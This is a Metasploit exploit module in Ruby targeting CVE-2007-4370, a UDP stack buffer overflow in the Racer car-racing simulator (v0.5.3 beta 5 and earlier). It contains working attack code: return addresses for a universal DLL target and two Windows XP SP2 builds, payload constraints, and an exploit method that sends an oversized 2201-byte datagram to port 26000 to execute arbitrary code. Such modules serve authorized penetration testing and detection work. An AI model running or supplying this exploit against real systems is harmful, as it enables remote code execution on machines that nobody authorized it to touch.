Path: blob/master/modules/exploits/windows/games/racer_503beta5.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Racer car/racing simulator (v0.5.3 beta 5 and
# earlier, CVE-2007-4370): a single oversized UDP datagram to the game
# port overflows a stack buffer. Every value below (offsets, return
# addresses, bad characters) is as the original author recorded it;
# the 'Notes' block explicitly marks reliability, stability and side
# effects as unknown, so treat those as unverified.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  # Declares module metadata and registers the one tunable option (RPORT).
  #
  # @param info [Hash] metadata merged by update_info (Metasploit convention)
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Racer v0.5.3 Beta 5 Buffer Overflow',
        'Description' => %q{
          This module exploits the Racer Car and Racing Simulator game
          versions v0.5.3 beta 5 and earlier. Both the client and server listen
          on UDP port 26000. By sending an overly long buffer we are able to
          execute arbitrary code remotely.
        },
        'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4370' ],
          [ 'OSVDB', '39601' ],
          [ 'EDB', '4283' ],
          [ 'BID', '25297' ],
        ],
        # Payload is capped at 1000 bytes; the padding arithmetic in #exploit
        # relies on payload.encoded never exceeding 1196 bytes, which this
        # 'Space' value guarantees. The two BadChars are excluded from the
        # encoded payload.
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x5c\x00",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
        },
        'DefaultOptions' => {
          'AllowWin32SEH' => true
        },
        'Platform' => 'win',
        # Each target carries only a 'Ret' address; the first is a
        # DLL-relative address (not OS-version specific), the other two are
        # tied to a particular Windows XP SP2 locale build.
        'Targets' => [
          # Tested ok aushack 20090503
          [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
          [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
          [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
        ],
        'DisclosureDate' => '2008-08-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(26000)
      ]
    )
  end

  # Builds the trigger datagram and sends it once over UDP.
  #
  # Layout, as written: 1001 bytes of random alphanumeric filler, the
  # 4-byte little-endian target return address, the encoded payload, then
  # random alphanumeric padding sized so the payload-plus-padding section
  # is always 1196 bytes. The datagram is therefore a fixed 2201 bytes
  # regardless of payload size — a stable length for a network detection
  # rule on UDP/26000 (the 1196 - length expression would go negative if
  # the payload ever exceeded 1196 bytes; 'Space' => 1000 prevents that).
  #
  # There is no response check: the method sends, starts the payload
  # handler, and closes the socket.
  def exploit
    connect_udp

    buf = Rex::Text.rand_text_alphanumeric(1001)
    buf << [target.ret].pack('V')
    buf << payload.encoded
    buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)

    udp_sock.put(buf)

    handler
    disconnect_udp
  end
end